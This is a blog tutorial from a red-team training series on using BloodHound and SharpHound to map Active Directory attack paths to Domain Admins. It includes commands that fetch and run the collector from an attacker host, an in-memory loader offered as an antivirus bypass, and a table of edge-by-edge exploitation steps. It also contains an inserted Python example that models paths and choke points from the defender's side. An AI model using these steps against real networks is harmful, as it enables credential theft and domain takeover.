Bloodhound: The Map That Shows You How to Own Active Directory
- Tony Kelly
- May 25
- 6 min read

Series: The Community's Red Team
Post: 17 of 17
Tags: bloodhound, active directory, SharpHound, attack paths, AD, tools
Read time: ~13 min
Prerequisites: Post 01 — Methodology Overview, Post 14 — Impacket
Active Directory is a maze. Thousands of users, hundreds of groups, dozens of computers, nested group memberships, ACL permissions, delegation rights, session data — the relationships between AD objects are too complex to map manually and too important to leave unmapped. A user who seems unimportant is three hops from Domain Admin through a chain of permissions that no one thought to audit.
Bloodhound is the tool that draws the map.
It collects AD relationship data, loads it into a graph database, and lets you query it visually. "What's the shortest path from this account to Domain Admins?" is a query result. "Which accounts have DCSync rights?" is a query result. "Where do Domain Admins have active sessions right now?" is a query result. The attack chain that would take hours of manual PowerShell enumeration to find takes thirty seconds in Bloodhound.
This post covers installation, data collection, the queries that matter, and how to read what the graph is telling you.
Installation
Bloodhound requires Neo4j as its graph database backend:
# Install Neo4j
sudo apt install neo4j -y
sudo neo4j start
# First-time setup: browse to http://localhost:7474
# Default credentials: neo4j:neo4j
# You'll be prompted to change the password — do it, you'll need it
Install Bloodhound GUI:
sudo apt install bloodhound -y
bloodhound &
# Login with your Neo4j credentials
If the apt version is outdated, download the latest release directly from the BloodHoundAD GitHub releases page.
Data Collection: SharpHound (Windows)
SharpHound is the data collector. It queries Active Directory, collects relationship data, and produces a ZIP of JSON files for import into Bloodhound.
Run it from a domain-joined Windows host with valid domain credentials (any domain user account is enough):
# Download SharpHound
iwr http://<your_ip>/SharpHound.exe -OutFile SharpHound.exe
# Collect all data types
.\SharpHound.exe -c All
# Target a specific domain
.\SharpHound.exe -c All -d INLANEFREIGHT.LOCAL
# Output to a specific directory
.\SharpHound.exe -c All --OutputDirectory C:\temp
Output is a ZIP file ending in _BloodHound.zip. Transfer it to your attack machine.
In-memory version (no binary on disk)
IEX (New-Object Net.WebClient).DownloadString('http://<your_ip>/SharpHound.ps1')
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\temp
Data Collection: bloodhound-python (Linux)
If you don't yet have a Windows foothold but have valid domain credentials, collect from your Linux attack machine:
pip install bloodhound --break-system-packages
bloodhound-python -d INLANEFREIGHT.LOCAL \
-ns 172.16.5.5 \
-c All \
-u forend \
-p Klmcargo2
Produces multiple JSON files. Zip them for clean import:
zip -r bloodhound_data.zip *.json
bloodhound-python is slower and less comprehensive than SharpHound, but it runs entirely from Linux: it needs valid domain credentials, not a Windows foothold.
Importing Data
Open Bloodhound GUI
Click Upload Data button (top right area)
Select your ZIP file (or individual JSON files)
Wait for the import — watch the node counters in the top-left increase
Clear old data before re-importing: Database Info panel → Clear Database. Stale data from previous collections will mix with new data and produce confusing results.
The First Queries to Run
As soon as data is imported, run these four queries immediately. They give you the attack landscape before you do anything else.
1. Find Principals with DCSync Rights
Analysis → Find Principals with DCSync Rights
DCSync rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All) let an account request any hash from the domain controller as if it were a domain controller itself. Any account with DCSync rights is an immediate path to full domain compromise via impacket-secretsdump.
If any account you've already compromised appears here, you're done.
2. Shortest Paths to Domain Admins
Analysis → Shortest Paths to Domain Admins
This query finds every attack path to Domain Admins across the entire dataset. It shows you what's possible from anywhere in the environment. Even if you haven't compromised a specific account yet, seeing the paths tells you which accounts to prioritize targeting.
3. List All Kerberoastable Accounts
Analysis → List all Kerberoastable Accounts
Service accounts with SPNs. Any account here is a Kerberoasting target — request TGS tickets with impacket-GetUserSPNs and crack them offline with Hashcat mode 13100.
Service accounts often have powerful group memberships that aren't obvious until you see them in the graph.
4. Find Computers Where Domain Users Are Local Admin
Analysis → Find Computers where Domain Users are Local Admin
If domain users are local admins on a machine, any domain account can dump LSASS there. If a Domain Admin has a session on that machine, that's a direct path to DA credentials.
The Workflow: From Owned Account to Domain Admin
As you compromise accounts throughout an engagement, mark them as owned in Bloodhound. This unlocks the most powerful attack path queries.
Right-click any user/computer node → Mark as Owned
Then run:
Analysis → Shortest Paths from Owned Principals to Domain Admins
This query takes every account you've marked as owned and shows every path from your current position to Domain Admins. As you compromise more accounts, the paths get shorter.
Reading the Graph
Node colors
Red — High value target: Domain Admins group, domain controllers, accounts with powerful rights
Yellow — User
Blue — Computer
Green — Group
Purple — GPO
Edge types and exploitation
Each edge type in Bloodhound represents a specific relationship that can be abused. Right-clicking any edge and clicking Help shows the exact PowerView commands to exploit it.
| Edge | What it means | How to exploit |
| --- | --- | --- |
| AdminTo | Local admin on machine | Dump LSASS, run CME/psexec |
| HasSession | User has active session here | Lateral move to this machine for credential dump |
| MemberOf | Group membership | Inherit all group's rights |
| GenericAll | Full control of object | Reset password, add to group, Kerberoast |
| GenericWrite | Modify object attributes | Set SPN → Kerberoast, set logon script |
| ForceChangePassword | Reset password without knowing old | Change it, then use the account |
| WriteDACL | Modify permissions on object | Grant yourself GenericAll |
| WriteOwner | Change object owner | Make yourself owner → then GenericAll |
| GetChanges + GetChangesAll | DCSync rights | impacket-secretsdump → full domain hash dump |
| CanPSRemote | WinRM access | evil-winrm -i <computer> -u <user> |
| SQLAdmin | MSSQL sysadmin rights | mssqlclient.py → xp_cmdshell |
| AllowedToDelegate | Kerberos constrained delegation | Delegation attack for service tickets |
HasSession is gold
The HasSession edge means a user has an active authentication session on a computer. If a Domain Admin has a session on a machine you have local admin on, that machine's LSASS contains the Domain Admin's credentials. Go dump it now.
Analysis → Find Computers where Domain Users are Local Admin
Cross-reference with:
Analysis → Find Computers with Unsupported Operating Systems
Older OS + DA session = high-value target.
Custom Cypher Queries
When the built-in queries don't cover what you need, write your own. Bloodhound uses the Cypher query language (Neo4j):
All paths from a specific user to DA
MATCH (u:User {name:"FOREND@INLANEFREIGHT.LOCAL"}),
(g:Group {name:"DOMAIN ADMINS@INLANEFREIGHT.LOCAL"}),
p=shortestPath((u)-[*1..]->(g))
RETURN p
Find users with WinRM access (CanPSRemote)
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group))
MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer)
RETURN p2
Find users with active DA sessions
MATCH p=(c:Computer)-[:HasSession]->(u:User)
WHERE u.admincount=true
RETURN p
Find all GenericAll relationships
MATCH p=(u:User)-[:GenericAll]->(t)
RETURN p
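To make concrete what shortestPath((u)-[*1..]->(g)) and the "Shortest Paths from Owned Principals to Domain Admins" query actually compute, here is an added Python example (not BloodHound's or SharpHound's code) that runs the same breadth-first search over a small constructed edge list, then goes one step further than the built-in query and lists the edges whose removal severs every path, which is what a defender fixes first. The node names, the edge list and the remediation wording are all invented for the example; HasSession runs Computer → User as in BloodHound's schema.

```python
"""Toy version of BloodHound's "Shortest Paths from Owned Principals to Domain
Admins" query.  Added example, not BloodHound or SharpHound code; every name
and edge below is constructed for illustration."""
from collections import deque

# Constructed edge list: (source, edge type, target).  Edge types match the
# table above; HasSession runs Computer -> User as in BloodHound's schema.
EDGES = [
    ("FOREND@CORP.LOCAL", "MemberOf", "HELPDESK@CORP.LOCAL"),
    ("FOREND@CORP.LOCAL", "CanPSRemote", "WS01.CORP.LOCAL"),
    ("HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "SVC_BACKUP@CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "SALES.USER@CORP.LOCAL"),
    ("SALES.USER@CORP.LOCAL", "MemberOf", "SALES@CORP.LOCAL"),
    ("SVC_BACKUP@CORP.LOCAL", "GenericAll", "IT ADMINS@CORP.LOCAL"),
    ("IT ADMINS@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
]
DOMAIN_ADMINS = "DOMAIN ADMINS@CORP.LOCAL"

# Defender's fix per edge type (invented wording, one line each).
REMEDIATION = {
    "MemberOf": "remove the member if the group grants more than the role needs",
    "AdminTo": "drop broad groups from local Administrators (LAPS + tiering)",
    "HasSession": "keep privileged accounts off lower-tier hosts; log them off",
    "GenericAll": "strip the ACE from the target object's DACL",
    "CanPSRemote": "restrict Remote Management Users on the host",
}


def build_adjacency(edges):
    """Directed adjacency list: node -> [(edge type, neighbour), ...]."""
    adj = {}
    for src, kind, dst in edges:
        adj.setdefault(src, []).append((kind, dst))
    return adj


def shortest_path(edges, owned, target):
    """Breadth-first search from every owned principal at once (what marking
    nodes as Owned does).  Returns the path as [(src, edge, dst), ...], or None
    when no principal in `owned` can reach `target`."""
    adj = build_adjacency(edges)
    parent = {node: None for node in owned}   # node -> (previous node, edge)
    queue = deque(owned)
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while parent[node] is not None:
                prev, kind = parent[node]
                path.append((prev, kind, node))
                node = prev
            return path[::-1]
        for kind, nxt in adj.get(node, []):
            if nxt not in parent:          # first visit == fewest hops
                parent[nxt] = (node, kind)
                queue.append(nxt)
    return None


def choke_points(edges, owned, target):
    """Edges whose removal alone leaves NO path from `owned` to `target`.
    Fixing one of these breaks every path at once, so they are the cheapest
    remediation; an edge that only shortens a path is not listed."""
    return [e for e in edges
            if shortest_path([x for x in edges if x != e], owned, target) is None]


def report(edges, owned, target):
    path = shortest_path(edges, owned, target)
    if path is None:
        print(f"No path from {sorted(owned)} to {target}")
        return
    print(f"{len(path)} hops from owned principals to {target}:")
    for src, kind, dst in path:
        print(f"  {src} -[{kind}]-> {dst}")
    print("Edges that sever every path (fix these first):")
    for src, kind, dst in choke_points(edges, owned, target):
        print(f"  {src} -[{kind}]-> {dst}: {REMEDIATION.get(kind, 'review')}")


if __name__ == "__main__":
    report(EDGES, {"FOREND@CORP.LOCAL"}, DOMAIN_ADMINS)
    report(EDGES, {"SALES.USER@CORP.LOCAL"}, DOMAIN_ADMINS)
```

On this constructed graph FOREND reaches Domain Admins in four hops (CanPSRemote → HasSession → GenericAll → MemberOf) and the five-hop route through HELPDESK is never reported, exactly as shortestPath behaves in Cypher. The choke-point pass shows why the built-in query alone is not enough for remediation: removing FOREND's CanPSRemote edge only lengthens the path, whereas removing the session on WS01 or the GenericAll ACE on IT ADMINS removes every path at once.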
Common Issues
No paths found to Domain Admins: Collection may have missed some data. Re-run with -c All and ensure SharpHound ran with sufficient privileges. Try "Shortest Paths from Domain Users to DA" for a broader search.
Data looks incomplete: bloodhound-python is less comprehensive than SharpHound. If you have a Windows foothold, always prefer SharpHound.
Neo4j won't start:
sudo neo4j stop && sudo neo4j start
# Check logs: /var/log/neo4j/neo4j.log
SharpHound blocked by AV: Use the PowerShell in-memory version, or run bloodhound-python from Linux.
Graph is too cluttered: Use the edge filtering panel in the left sidebar to show only specific edge types. Filter to AdminTo and HasSession for a clear picture of lateral movement paths.
Quick Reference
# Install
sudo apt install neo4j bloodhound -y
sudo neo4j start
# Collect — Windows (SharpHound)
.\SharpHound.exe -c All
.\SharpHound.exe -c All -d INLANEFREIGHT.LOCAL
# Collect — Linux (bloodhound-python)
bloodhound-python -d <domain> -ns <DC_ip> -c All -u <user> -p <pass>
zip -r data.zip *.json
# Import: Open BloodHound GUI → Upload Data → select ZIP
# Key queries (Analysis tab)
# Find Principals with DCSync Rights
# Shortest Paths to Domain Admins
# List all Kerberoastable Accounts
# Find Computers where Domain Users are Local Admin
# Shortest Paths from Owned Principals to Domain Admins
# Mark as owned
# Right-click user/computer node → Mark as Owned
# Key Cypher — paths from specific user to DA
MATCH (u:User {name:"USER@DOMAIN.LOCAL"}),
(g:Group {name:"DOMAIN ADMINS@DOMAIN.LOCAL"}),
p=shortestPath((u)-[*1..]->(g))
RETURN p
Series Complete
You've now covered the full red team methodology from first scan to Active Directory domain compromise. Seventeen posts, seventeen tools, one connected chain:
Nmap → Gobuster + Nikto → Enum4linux → CrackMapExec →
Hydra + Medusa → Hashcat + John → Netcat → Metasploit →
LinPEAS/WinPEAS → Impacket → Chisel + Ligolo-ng → Bloodhound
Every tool has a place in that chain. Every post connects to the ones before and after it. The methodology is the map; the tools are how you move through it.
The exploit only works on the uninformed. Now you're informed.
MeshForge — Training the Community's Red Team
They count on your ignorance. The exploit only works on the uninformed.